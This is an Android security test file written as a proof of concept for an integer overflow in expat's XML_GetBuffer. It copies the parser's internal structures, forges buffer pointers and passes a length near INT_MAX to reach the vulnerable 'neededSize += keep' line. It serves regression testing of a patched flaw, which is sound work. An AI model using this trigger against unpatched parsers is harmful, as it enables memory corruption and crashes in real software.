1 /*
2  * Copyright (C) 2024 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
17 #include <unistd.h>
18 
19 #include <vector>
20 
21 #include "common.h"
22 #include "expat.h"
23 #include "expat_config.h"
24 #include "expat_external.h"
25 #include "internal.h"
26 #include "xmlrole.h"
27 
28 constexpr long kMaxEntries = 1024 * 1024;
29 
30 // Defining 'kBufferSize' such that 'kBufferPtrOffset' is greater than XML_CONTENT_BYTES, but still
31 // within a valid memory region. Defining end offset to be after the pointer offset.
32 constexpr size_t kBufferSize = XML_CONTEXT_BYTES + 2;
33 constexpr size_t kBufferPtrOffset = kBufferSize - 1;
34 constexpr size_t kBufferEndOffset = kBufferPtrOffset + 1;
35 
36 // Setting 'kBufferLength' such that value of 'neededSize' defined in external/expat/lib/xmlparse.c
37 // is INT_MAX so that an integer overflow check on 'neededSize' is avoided so that control reaches
38 // the line 'neededSize += keep;'.
39 constexpr size_t kBufferLength = INT_MAX - (kBufferEndOffset - kBufferPtrOffset);
40 
41 // The following structure definitions are taking reference from the definitions with the same name
42 // declared in the file external/expat/lib/xmlparse.c
43 // The test explicitly declares these structures because their definitions are a part of the
44 // vulnerable file and hence can't be included in the PoC directly.
45 
46 typedef enum XML_Error PTRCALL Processor(XML_Parser parser, const char *start, const char *end,
47                                          const char **endPtr);
48 
49 typedef struct binding {
50     struct prefix *prefix;
51     struct binding *nextTagBinding;
52     struct binding *prevPrefixBinding;
53     const struct attribute_id *attId;
54     XML_Char *uri;
55     int uriLen;
56     int uriAlloc;
57 } BINDING;
58 
59 typedef struct prefix {
60     const XML_Char *name;
61     BINDING *binding;
62 } PREFIX;
63 
64 typedef struct {
65     const XML_Char *name;
66     const XML_Char *textPtr;
67     int textLen;   /* length in XML_Chars */
68     int processed; /* # of processed bytes - when suspended */
69     const XML_Char *systemId;
70     const XML_Char *base;
71     const XML_Char *publicId;
72     const XML_Char *notation;
73     XML_Bool open;
74     XML_Bool is_param;
75     XML_Bool is_internal; /* true if declared in internal subset outside PE */
76 } ENTITY;
77 
78 typedef struct open_internal_entity {
79     const char *internalEventPtr;
80     const char *internalEventEndPtr;
81     struct open_internal_entity *next;
82     ENTITY *entity;
83     int startTagLevel;
84     XML_Bool betweenDecl; /* WFC: PE Between Declarations */
85 } OPEN_INTERNAL_ENTITY;
86 
87 typedef struct attribute_id {
88     XML_Char *name;
89     PREFIX *prefix;
90     XML_Bool maybeTokenized;
91     XML_Bool xmlns;
92 } ATTRIBUTE_ID;
93 
94 typedef struct {
95     const ATTRIBUTE_ID *id;
96     XML_Bool isCdata;
97     const XML_Char *value;
98 } DEFAULT_ATTRIBUTE;
99 
100 typedef struct {
101     const XML_Char *name;
102     PREFIX *prefix;
103     const ATTRIBUTE_ID *idAtt;
104     int nDefaultAtts;
105     int allocDefaultAtts;
106     DEFAULT_ATTRIBUTE *defaultAtts;
107 } ELEMENT_TYPE;
108 
109 typedef struct {
110     enum XML_Content_Type type;
111     enum XML_Content_Quant quant;
112     const XML_Char *name;
113     int firstchild;
114     int lastchild;
115     int childcnt;
116     int nextsib;
117 } CONTENT_SCAFFOLD;
118 
119 typedef struct block {
120     struct block *next;
121     int size;
122     XML_Char s[1];
123 } BLOCK;
124 
125 typedef struct {
126     BLOCK *blocks;
127     BLOCK *freeBlocks;
128     const XML_Char *end;
129     XML_Char *ptr;
130     XML_Char *start;
131     const XML_Memory_Handling_Suite *mem;
132 } STRING_POOL;
133 
134 typedef const XML_Char *KEY;
135 
136 typedef struct {
137     KEY name;
138 } NAMED;
139 
140 typedef struct {
141     NAMED **v;
142     unsigned char power;
143     size_t size;
144     size_t used;
145     const XML_Memory_Handling_Suite *mem;
146 } HASH_TABLE;
147 
148 typedef struct {
149     HASH_TABLE generalEntities;
150     HASH_TABLE elementTypes;
151     HASH_TABLE attributeIds;
152     HASH_TABLE prefixes;
153     STRING_POOL pool;
154     STRING_POOL entityValuePool;
155     /* false once a parameter entity reference has been skipped */
156     XML_Bool keepProcessing;
157     /* true once an internal or external PE reference has been encountered;
158        this includes the reference to an external subset */
159     XML_Bool hasParamEntityRefs;
160     XML_Bool standalone;
161 #ifdef XML_DTD
162     /* indicates if external PE has been read */
163     XML_Bool paramEntityRead;
164     HASH_TABLE paramEntities;
165 #endif /* XML_DTD */
166     PREFIX defaultPrefix;
167     /* === scaffolding for building content model === */
168     XML_Bool in_eldecl;
169     CONTENT_SCAFFOLD *scaffold;
170     unsigned contentStringLen;
171     unsigned scaffSize;
172     unsigned scaffCount;
173     int scaffLevel;
174     int *scaffIndex;
175 } DTD;
176 
177 typedef struct {
178     const XML_Char *str;
179     const XML_Char *localPart;
180     const XML_Char *prefix;
181     int strLen;
182     int uriLen;
183     int prefixLen;
184 } TAG_NAME;
185 
186 typedef struct tag {
187     struct tag *parent;  /* parent of this element */
188     const char *rawName; /* tagName in the original encoding */
189     int rawNameLength;
190     TAG_NAME name; /* tagName in the API encoding */
191     char *buf;     /* buffer for name components */
192     char *bufEnd;  /* end of the buffer */
193     BINDING *bindings;
194 } TAG;
195 
196 typedef struct {
197     unsigned long version;
198     unsigned long hash;
199     const XML_Char *uriName;
200 } NS_ATT;
201 
202 #ifdef XML_DTD
203 typedef unsigned long long XmlBigCount;
204 typedef struct accounting {
205     XmlBigCount countBytesDirect;
206     XmlBigCount countBytesIndirect;
207     int debugLevel;
208     float maximumAmplificationFactor; // >=1.0
209     unsigned long long activationThresholdBytes;
210 } ACCOUNTING;
211 
212 typedef struct entity_stats {
213     unsigned int countEverOpened;
214     unsigned int currentDepth;
215     unsigned int maximumDepthSeen;
216     int debugLevel;
217 } ENTITY_STATS;
218 #endif
219 
220 struct XML_ParserStruct {
221     /* The first member must be m_userData so that the XML_GetUserData
222         macro works. */
223     void *m_userData;
224     void *m_handlerArg;
225     char *m_buffer;
226     const XML_Memory_Handling_Suite m_mem;
227     /* first character to be parsed */
228     const char *m_bufferPtr;
229     /* past last character to be parsed */
230     char *m_bufferEnd;
231     /* allocated end of m_buffer */
232     const char *m_bufferLim;
233     XML_Index m_parseEndByteIndex;
234     const char *m_parseEndPtr;
235     XML_Char *m_dataBuf;
236     XML_Char *m_dataBufEnd;
237     XML_StartElementHandler m_startElementHandler;
238     XML_EndElementHandler m_endElementHandler;
239     XML_CharacterDataHandler m_characterDataHandler;
240     XML_ProcessingInstructionHandler m_processingInstructionHandler;
241     XML_CommentHandler m_commentHandler;
242     XML_StartCdataSectionHandler m_startCdataSectionHandler;
243     XML_EndCdataSectionHandler m_endCdataSectionHandler;
244     XML_DefaultHandler m_defaultHandler;
245     XML_StartDoctypeDeclHandler m_startDoctypeDeclHandler;
246     XML_EndDoctypeDeclHandler m_endDoctypeDeclHandler;
247     XML_UnparsedEntityDeclHandler m_unparsedEntityDeclHandler;
248     XML_NotationDeclHandler m_notationDeclHandler;
249     XML_StartNamespaceDeclHandler m_startNamespaceDeclHandler;
250     XML_EndNamespaceDeclHandler m_endNamespaceDeclHandler;
251     XML_NotStandaloneHandler m_notStandaloneHandler;
252     XML_ExternalEntityRefHandler m_externalEntityRefHandler;
253     XML_Parser m_externalEntityRefHandlerArg;
254     XML_SkippedEntityHandler m_skippedEntityHandler;
255     XML_UnknownEncodingHandler m_unknownEncodingHandler;
256     XML_ElementDeclHandler m_elementDeclHandler;
257     XML_AttlistDeclHandler m_attlistDeclHandler;
258     XML_EntityDeclHandler m_entityDeclHandler;
259     XML_XmlDeclHandler m_xmlDeclHandler;
260     const ENCODING *m_encoding;
261     INIT_ENCODING m_initEncoding;
262     const ENCODING *m_internalEncoding;
263     const XML_Char *m_protocolEncodingName;
264     XML_Bool m_ns;
265     XML_Bool m_ns_triplets;
266     void *m_unknownEncodingMem;
267     void *m_unknownEncodingData;
268     void *m_unknownEncodingHandlerData;
269     void(XMLCALL *m_unknownEncodingRelease)(void *);
270     PROLOG_STATE m_prologState;
271     Processor *m_processor;
272     enum XML_Error m_errorCode;
273     const char *m_eventPtr;
274     const char *m_eventEndPtr;
275     const char *m_positionPtr;
276     OPEN_INTERNAL_ENTITY *m_openInternalEntities;
277     OPEN_INTERNAL_ENTITY *m_freeInternalEntities;
278     XML_Bool m_defaultExpandInternalEntities;
279     int m_tagLevel;
280     ENTITY *m_declEntity;
281     const XML_Char *m_doctypeName;
282     const XML_Char *m_doctypeSysid;
283     const XML_Char *m_doctypePubid;
284     const XML_Char *m_declAttributeType;
285     const XML_Char *m_declNotationName;
286     const XML_Char *m_declNotationPublicId;
287     ELEMENT_TYPE *m_declElementType;
288     ATTRIBUTE_ID *m_declAttributeId;
289     XML_Bool m_declAttributeIsCdata;
290     XML_Bool m_declAttributeIsId;
291     DTD *m_dtd;
292     const XML_Char *m_curBase;
293     TAG *m_tagStack;
294     TAG *m_freeTagList;
295     BINDING *m_inheritedBindings;
296     BINDING *m_freeBindingList;
297     int m_attsSize;
298     int m_nSpecifiedAtts;
299     int m_idAttIndex;
300     ATTRIBUTE *m_atts;
301     NS_ATT *m_nsAtts;
302     unsigned long m_nsAttsVersion;
303     unsigned char m_nsAttsPower;
304 #ifdef XML_ATTR_INFO
305     XML_AttrInfo *m_attInfo;
306 #endif
307     POSITION m_position;
308     STRING_POOL m_tempPool;
309     STRING_POOL m_temp2Pool;
310     char *m_groupConnector;
311     unsigned int m_groupSize;
312     XML_Char m_namespaceSeparator;
313     XML_Parser m_parentParser;
314     XML_ParsingStatus m_parsingStatus;
315 #ifdef XML_DTD
316     XML_Bool m_isParamEntity;
317     XML_Bool m_useForeignDTD;
318     enum XML_ParamEntityParsing m_paramEntityParsing;
319 #endif
320     unsigned long m_hash_secret_salt;
321 #ifdef XML_DTD
322     ACCOUNTING m_accounting;
323     ENTITY_STATS m_entity_stats;
324 #endif
325 };
326 
327 XML_Parser parser;
328 
329 struct mem_struct_t {
330     void *mem_ptr;
331     size_t mem_size;
332 };
333 
334 mem_struct_t xml_malloc_list[kMaxEntries];
335 static int xml_malloc_list_size = 0;
336 
xml_malloc(size_t size)337 void *xml_malloc(size_t size) {
338     void *ptr = malloc(size);
339     if (xml_malloc_list_size < kMaxEntries) {
340         xml_malloc_list[xml_malloc_list_size].mem_ptr = ptr;
341         xml_malloc_list[xml_malloc_list_size].mem_size = size;
342         ++xml_malloc_list_size;
343     }
344     return ptr;
345 }
346 
match_allocation_size(void * target_ptr,int target_size)347 bool match_allocation_size(void *target_ptr, int target_size) {
348     for (int i = 0; i < xml_malloc_list_size; ++i) {
349         if (target_ptr == xml_malloc_list[i].mem_ptr &&
350             target_size == xml_malloc_list[i].mem_size) {
351             return true;
352         }
353     }
354     return false;
355 }
356 
main()357 int main() {
358     XML_Memory_Handling_Suite memsuite = {};
359     memsuite.malloc_fcn = xml_malloc;
360     memsuite.realloc_fcn = realloc;
361     memsuite.free_fcn = free;
362     parser = XML_ParserCreate_MM(nullptr, &memsuite, nullptr);
363     FAIL_CHECK(parser);
364 
365     bool match_found = match_allocation_size(parser, sizeof(struct XML_ParserStruct));
366     FAIL_CHECK(match_found);
367 
368     std::vector<char> m_buffervector(kBufferSize);
369     parser->m_buffer = m_buffervector.data();
370     FAIL_CHECK(parser->m_buffer);
371 
372     parser->m_bufferPtr = parser->m_buffer + kBufferPtrOffset;
373     parser->m_bufferEnd = parser->m_buffer + kBufferEndOffset;
374     parser->m_bufferLim = parser->m_bufferEnd + 1;
375 
376     XML_GetBuffer(parser, kBufferLength);
377 
378     if (parser) {
379         free(parser);
380         parser = nullptr;
381     }
382     return EXIT_SUCCESS;
383 }
384